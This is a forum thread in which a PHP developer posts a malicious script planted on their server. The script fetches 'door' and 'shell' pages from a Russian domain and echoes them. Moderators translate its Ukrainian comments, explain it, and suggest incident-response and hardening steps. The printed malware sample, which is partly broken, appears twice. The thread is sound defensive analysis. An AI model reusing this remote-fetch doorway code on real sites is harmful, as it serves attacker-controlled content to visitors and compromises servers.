PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
Loading
It is currently Wed Dec 19, 2018 11:04 am

All times are UTC - 5 hours




Post new topic Reply to topic  [ 11 posts ] 
Author Message
PostPosted: Sun Oct 19, 2014 11:36 pm 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
There is a file called index.php which got loaded on our server. The code inside the PHP(below) seems malicious

Syntax: [ Download ] [ Hide ]
$key = array_search('', $_GET); if ($key == 'test') { $url_server = "http://fbschool.ru/door/test1.ru"."/".$key.".php"; } else { $url_server = "http://fbschool.ru/door/".str_replace('www.', '', $_SERVER[ 'SERVER_NAME' ])."/".$key.".php"; } //перевірка на то чи існує файл дора $Headers = @get_headers($url_server); if(strpos($Headers[0], '200')) { function get_curl ($url, $n) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $content); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 600); if ($n==0){ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);} $output = curl_exec ($ch); curl_close ($ch); return $output; } function get_fsockopen ($url, $n) { $post=""; $u = parse_url($url); if( $fp = fsockopen($u['host'],!empty($u['port']) ? $u['port'] : 80 )){ $headers = 'POST '. $u['path'] .' HTTP/1.0'. "\r\n"; $headers .= 'Host: '. $u['host'] ."\r\n"; if ($n==0){ $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } $headers .= 'Content-type: text/html' . "\r\n"; $headers .= 'Content-length: ' . strlen($post) . "\r\n"; $headers .= 'Connection: Close' . "\r\n\r\n"; $headers .= $post; fwrite($fp, $headers); $ret = ''; while( !feof($fp) ){ $ret .= fgets($fp,1024); } $html = substr($ret,strpos($ret,"\r\n\r\n") + 4); fclose($fp); } return $html; } if( function_exists("curl_init") ) { //берем сторінку дора $page_host = get_curl($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; //берем сторінку шелла $page = get_curl($page_host_arr[0], 1); } else { $page_host = get_fsockopen($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; $page = get_fsockopen($page_host_arr[0], 1); } //вирізаємо всі непотрібні теги $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('/ ", $page, 1); //вставка контенту $page = preg_replace('//', " $page_host_tmp", $page, 1); echo $page; exit; }
 


I do not know if it is attempting to sell some unwanted spam products or open a backdoor as I did not want to infect my computer. I used http://global.sitesafety.trendmicro.com/result.php to check the link http://fbschool.ru/door/test1.ru but did not find any information.

What steps should I take?

Any advice would be appreciated.


Top
 Profile  
 
PostPosted: Mon Oct 20, 2014 12:11 am 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
Is it your own file? No? Then it shouldn't be there. Period.

Check the modification date on the file, then look through your access logs for an indication as to how they got it on your server.


Top
 Profile  
 
PostPosted: Mon Oct 20, 2014 9:36 pm 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks requinix,

It is not our file. Which access logs do I need to check? We are running Win 2008 with IIS. Our server admin does not have time for these tasks.


Top
 Profile  
 
PostPosted: Mon Oct 20, 2014 10:44 pm 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.

IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.


Top
 Profile  
 
PostPosted: Thu Oct 23, 2014 8:08 pm 
Offline
Moderator
User avatar

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
Sidenote: The comments in the code are in Ukrainian. Interesting.


Top
 Profile  
 
PostPosted: Thu Oct 23, 2014 10:14 pm 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks requinix,
requinix wrote:
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.


Agreed, but lot of times you don't have a choice and have to tolerate whoever manages the servers.
requinix wrote:
IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.


Thanks, I will check that out. Are there any guides which explain how to lock down a IIS server, scan for PHP vulnerabilities etc?

I appreciate your time and assistance with this thread.


Top
 Profile  
 
PostPosted: Thu Oct 23, 2014 10:17 pm 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,
Weirdan wrote:
Sidenote: The comments in the code are in Ukrainian. Interesting.

Can you please tell us what they mean?

It appears the code tries to open a file from some remote server and then open a socket.

I do not know if it is attempting to sell some unwanted spam products or open a backdoor


Top
 Profile  
 
PostPosted: Fri Oct 24, 2014 8:12 pm 
Offline
Moderator
User avatar

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):
Syntax: [ Download ] [ Hide ]
<?php
$key = array_search('', $_GET);
if ($key == 'test') {
        $url_server = "http://fbschool.ru/door/test1.ru" . "/" . $key . ".php";
} else {
        $url_server = "http://fbschool.ru/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php";
}

// перевірка на то чи існує файл дора
// checking if the door [backdoor or doorway?] file exists
$Headers = @get_headers($url_server);

if (strpos($Headers[0], '200')) {

        function get_curl($url, $n) {
                $ch = curl_init($url);
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $content);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 600);
                if ($n == 0) {
                        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
                }
                $output = curl_exec ($ch);
                curl_close($ch);
                return $output;
        }

        function get_fsockopen($url, $n) {
                $post = "";
                $u = parse_url($url);
                if ($fp = fsockopen($u['host'], !empty($u['port']) ? $u['port'] : 80)) {

                        $headers = 'POST ' . $u['path'] . ' HTTP/1.0' . "\r\n";
                        $headers .= 'Host: ' . $u['host'] . "\r\n";
                        if ($n == 0) {
                                $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
                        }
                        $headers .= 'Content-type: text/html' . "\r\n";
                        $headers .= 'Content-length: ' . strlen($post) . "\r\n";
                        $headers .= 'Connection: Close' . "\r\n\r\n";
                        $headers .= $post;
                        fwrite($fp, $headers);

                        $ret = '';
                        while (!feof($fp)) {
                                $ret .= fgets($fp, 1024);
                        }
                        $html = substr($ret, strpos($ret, "\r\n\r\n") + 4);
                        fclose($fp);
                }
                return $html;
        }
        if (function_exists("curl_init")) {
                // берем сторінку дора
                // getting the door [see note above] page
                $page_host = get_curl($url_server, 0);
                $page_host_arr = explode("\r\n", $page_host);
                for ($i = 4; $i <= count($page_host_arr); $i++)
                        $page_host_tmp .= $page_host_arr[$i] . "\r\n";

                // берем сторінку шелла
                // getting the shell page
                $page = get_curl($page_host_arr[0], 1);
        } else {
                $page_host = get_fsockopen($url_server, 0);
                $page_host_arr = explode("\r\n", $page_host);
                for ($i = 4; $i <= count($page_host_arr); $i++)
                        $page_host_tmp .= $page_host_arr[$i] . "\r\n";
                $page = get_fsockopen($page_host_arr[0], 1);
        }
        // вирізаємо всі непотрібні теги
        // removing unnecessary tags
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('/ ", $page, 1); // [syntax error here]
        // вставка контенту
        // inserting content
        $page = preg_replace('
//', " $page_host_tmp", $page, 1);
        echo $page;
        exit;
}
 


The code appears to fetch a newline delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains syntax error, and those preg_replace calls seem like they are missing actual regexp (first parameter).


Top
 Profile  
 
PostPosted: Sat Oct 25, 2014 12:38 am 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,
Weirdan wrote:
Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):
The code appears to fetch a newline delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains syntax error, and those preg_replace calls seem like they are missing actual regexp (first parameter).


The file was using the eval function to evaluate a remotely fetched file using file_get_contents. It seems like a XSS exploit.

I did not want to run the file so used echo instead of eval to know the contents of the remote file being loaded and posted it here.

1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

2. What are the ways we can lock down the server from running such XSS exploits?

Thanks a lot for your time and advice.


Top
 Profile  
 
PostPosted: Mon Oct 27, 2014 4:21 am 
Offline
Moderator
User avatar

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
p_s_92 wrote:
1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

You could use disabled_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.

Quote:
2. What are the ways we can lock down the server from running such XSS exploits?

You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).


Top
 Profile  
 
PostPosted: Sun Nov 02, 2014 11:40 am 
Offline
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,

I am sorry for the late reply.

Weirdan wrote:
p_s_92 wrote:
1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

You could use disabled_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.


Yes, most ways can be circumvented.

Quote:
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).

The server admin did not have time. We are using Mura CMS. He told us that needs to be upgraded and could be the reason how the file got there. We filter and validate input, escape input (for sql). Escape output is something we need to focus on.

1. How do you disable execution of uploaded files (one could put php code in image EXIF tags, for example)?

Thanks a lot for all your time and assistance with this thread.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 11 posts ] 

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 5 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group